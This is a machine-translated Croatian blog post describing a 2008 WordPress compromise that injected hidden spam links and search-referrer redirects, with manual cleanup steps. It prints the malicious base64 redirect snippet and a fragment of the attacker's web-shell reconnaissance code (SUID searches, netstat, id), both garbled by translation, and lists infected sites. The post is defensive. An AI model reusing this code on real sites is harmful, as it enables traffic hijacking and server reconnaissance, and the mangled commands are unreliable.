Virusna blogosfera ... ali što ste imali sa mnom ?!

U posljednjih mjesec dana, dobio sam upozorenja Virus blog u nekim posjetitelja. U početku sam ignorirao upozorenja, jer sam instalirao prilično dobar antivirus (Kaspersky AV 2009) I iako je blog za dugo vremena, nikada nisam dobio virus upozorenje (.. Vidjela sam nešto sumnjivo ranije da prvi refresh nestali. Konačno ...).
Polako je počeo da se pojave velike varijacije prometa posjetiteljaNakon što je pao promet u zadnje vrijeme stalno i počeo se sve više i više ljudi koji mi kažu da potajnosettings.com to je virused. Jučer sam dobio od nekoga screenshot učinjeno kada je antivirusni blokirani rukopis iz nevidljivostisettings.com:Trojan-Clicker.HTML.IFrame.gr. To je bio prilično uvjerljiv na mene, da sam mu sve izvore tražili. Prva ideja da je palo na pamet bila je učiniti nadogradnja najnovije WordPress (2.5.1), ali ne prije nego što stara skripta izbrisati sve datoteke WordPress i učiniti backup baze podataka. Ovaj postupak nije uspio i vjerojatno mi je trebalo dugo vremena da shvatim gdje je greška, ako mi nije rekao. u razgovoru uz kavu, on je pronašao Google, a bilo bi dobro da ga vidi.
MyDigitalLife.info, objavio je članak pod naslovom: “WordPress Hack: Obnova i popraviti Google i tražilice ili Ne Cookie prometa preusmjeren na vaš-Needs.info, AnyResults.Net, Golden-Info.net i drugim nezakonitim stranice"To je kraj nit mi je trebalo.
Riječ je o iskorištavati WordPress na temelju kolačića, Što mislim da je vrlo složen i napravio knjigu. Dovoljno pametan da bi SQL Injection Baza podataka o blogu, stvoriti nevidljivi korisnik jednostavna rutinska provjera kontrolna ploča->korisnici, provjeriti poslužitelja direktorija i datoteka "writable" (S chmod 777), tražiti i izvršiti datoteke s privilegijama root korisnika ili skupine. Ne znam koji iskorištavaju ime i vidjeti da postoji nekoliko članaka o njemu pisano, unatoč činjenici da su mnogi blogovi zaraženi, uključujući i Rumunjsku. Ok ... Pokušat ću pokušati objasniti općenitosti o virusu.

Što je virus?

Prvo, ubacite stranice izvor za blogove, nevidljive veze s posjetiteljima, ali vidljiv i indeksira za tražilice, posebno Google. Ovako prijenos stranicu rang stanice označene napadača. Drugo, umetnut je drugi preusmjeravanje broj URL za posjetitelje koji dolaze iz Googlea, Live, Yahoo, ... ili RSS čitač, a ne stranica kolačić. antivirusni detektira kao preusmjeravanje Trojan-Clicker.HTML.

Simptomi:

Masivni pad prometa posjetitelja, Pogotovo na blogovima, gdje je većina posjetitelja dolaze iz Googlea.

Identifikacija: (Stoga je postao problem za one koji ne znaju kako phpMyAdmin, PHP i Linux)

LA. POZOR! Prvo napraviti backup baze podataka!

1. Provjerite datoteke izvornog index.php, header.php, footer.php, Blog temu i vidjeti postoji li kod koji koristi enkripciju base64 ili sadrži “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”u obliku:


$ Seref = array ("google", "msn", "živjeti", "AltaVista"
"Pitaj", "Yahoo", "AOL", "CNN", "vrijeme", "Alexa");
Ser = $ 0; foreach ($ $ Seref kao sudac)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), sudac $) == false) {$ ser = "1;? Break;}!
if ($ ser == ”1? && sizeof ($ _ COOKIE) == 0) {header (” Location: http: // ”.base64_decode (” YW55cmVzdWx0cy5uZXQ = ”).” / ”); Izlaz;
}?>

Ili ... nešto. Izbriši ovaj kod!

Kliknite na sliku ...

Indeks broj

Na gornjoj snimci zaslona slučajno sam odabrao i " ". Taj kod mora ostati.

2. Koristiti phpMyAdmin i otići na tablici baze podataka wp_usersGdje provjeriti ako nema korisničko ime stvorio na 00:00:00 0000-00-00 (Mogući prostor user_login napisati "WordPress". Napišite ovaj korisnički ID (ID polja), a zatim ga izbrisati.

Kliknite na sliku ...

lažni korisnik

* Zelena linija trebala biti uklonjena i zadržao svoju iskaznicu. U slučaju Je ID = 8 .

3. Idi na tablici wp_usermeta, Gdje se Smješten i brisanje linije za ID (gdje se polje user_id ID vrijednost se brišu).

4. U tablici wp_optionIdi active_plugins i vidjeti što plugin omogućen osumnjičenog. To se može koristiti kao završetaka _old.giff, _old.pngg, _old.jpeg, _new.php.giffitd. kombinacije bogatih ekstenzija slike sa _old i _new.

ODABERITE * FROM wp_options WHERE option_name = 'active_plugins'

Izbrišite ovaj dodatak, a zatim idite na blog -> Nadzorna ploča -> Dodaci, gdje deaktivirate i aktivirate bilo koji dodatak.

Kliknite na sliku kako bi vidjeli što se čini active_plugins virus datoteku.

uključiti

Slijedite put na FTP ili SSH, navedeno je u active_plugins i brisanje datoteke s poslužitelja.

5. Sve u phpMyAdmin, u tablici wp_option, Pronaći i izbrisati redak koji sadrži "rss_f541b3abd05e7962fcab37737f40fad8"I među"internal_links_cache ".
U internal_links_cache su šifrirane spam linkove koji se pojavljuju na svoj blog i Google Adsense code, Haker.

6. Preporučio je da se promijenite lozinku Blog i prijava Izbaci sve sumnjive userele. Upgrade na najnoviju verziju WordPress i postaviti blog ne dopustiti registraciju novih korisnika. Nema gubitka ... ne mogu komentirati i nelogično.

Pokušao sam gore objasniti malo, što učiniti u takvoj situaciji, očistiti blog od ovog virusa. Problem je puno ozbiljniji nego što se čini i nije gotovo riješen, jer se koriste sigurnosnih propusta web poslužitelj hosting, što je blog.

Kao prve mjere sigurnosti, s pristupom SSH, Napraviti neke provjere na server da vidi je li sve datoteke kao što su * _old * i * _new. * S završetaka.giff,. jpeg,. pngg,. jpgg. Ove datoteke trebaju biti izbrisani. Ako ste preimenovati datoteku, primjerice. top_right_old.giff in top_right_old.phpVidimo da je točno file server exploit koda.

Neke korisne upute za provjeru, čišćenje i osiguranje poslužitelja. (putem SSH-a)

1.  cd / tmp i provjeriti da li postoje mape poput tmpVFlma ili druge kombinacije ima isto ime i izbrisati. Pogledajte screenshot dolje, dvije takve mape od mene:

tmpserver

rm-rf nazivmape

2. Provjerite elimiati (chmod promjene) kao mogući mapa atribute chmod 777

naći sve zapisivati files u trenutnom diru: Pronađite. Tip-f-Perm-2-LS
pronaći sve writable direktorija u tekuće dir: Pronađite. Tip-d-Perm-2-LS
pronaći sve upisive mape i files u trenutnom diru: Pronađite. -Perm-2-LS

3. U potrazi za sumnjive datoteke na poslužitelju.

pronaći. -ime “* _new.php *”
pronaći. -ime “* _old.php *”
pronaći. -ime "* .jpgg"
pronaći. -ime “* _giff”
pronaći. -ime “* _pngg”

4, POZOR! datoteke koje su postavljene malo SUID si SGID. Ove datoteke izvršavanje s privilegijama korisnika (skupina) ili korijena, a ne korisnika koji izvrši datoteku. Te datoteke mogu dovesti do korijena kompromisa, ako je sigurnosna pitanja. Ako koristite datoteke s Suid i SGID bita, radi 'chmod 0 " ili deinstalirati paket ih sadrži.

Iskoristiti sadrži negdje u izvor ...:

if (! $ safe_mode) {
ako ($ os_type == 'nix') {
$ os. = izvrši ('sysctl -n kern.ostype');
$ os. = izvrši ('sysctl -n kern.osrelease');
$ os. = izvrši ('sysctl -n kernel.ostype');
$ os. = izvrši ('sysctl -n kernel.osrelease');
if (prazno ($ korisnik)) $ user = izvrši ('id');
$ Nadimci = array (
"=>",
'naći suid files '=>' pronađi / -tip f -perm -04000 -ls ',
'nađi sgid files '=>' pronađi / -tip f -perm -02000 -ls ',
'pronađi sve za pisanje files u trenutnom direktoriju '=>' pronađi. -tip f -perm -2 -ls ',
'pronađi sve upisive direktorije u trenutni direktorij' => 'pronađi. -tip d -perm -2 -ls ',
'pronaći sve imenike za pisanje i files u trenutnom direktoriju '=>' pronađi. -perm -2 -ls ',
'prikaži otvorene luke' => 'netstat -an | grep -slušam ',
);
} Else {
$ os_name. = izvrši ('pogled');
$ user. = izvrši ('echo% username%');
$ Nadimci = array (
"=>",
'show runing services' => 'neto početak',
'show process list' => 'popis zadataka'
);
}

Na ovaj način ... zapravo pronalazi povrede u sigurnosti. Luke otvaranje imenika "writable" i grupa ovršni povlastice datoteke / root.

Povratak s više ...

Neki blogovi zaražene: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... Popis ide na ... puno.

Pomoću Google tražilice možete provjeriti je li blog zaražen. kopiraj i zalijepi:

stranica www.blegoo.com buy

Laku noć i povećati raditi ;) Uskoro ću se s promjenama na Eugena prevezibil.imprevizibil.com.

BRB :)

TO: POZOR! Promjena WordPress teme ili nadograditi na WordPress 2.5.1, nije rješenje da biste dobili osloboditi od ovaj virus.

Virusna blogosfera ... ali što ste imali sa mnom ?!

O autoru

potajno

Zaljubljen u sve gadgete i IT, pišem sa zadovoljstvom u stealthusettings.com od 2006. godine i volim s vama otkriti nove stvari o računalima i operativnim sustavima macOS, Linux, Windows, iOS i Android.

Ostavite komentar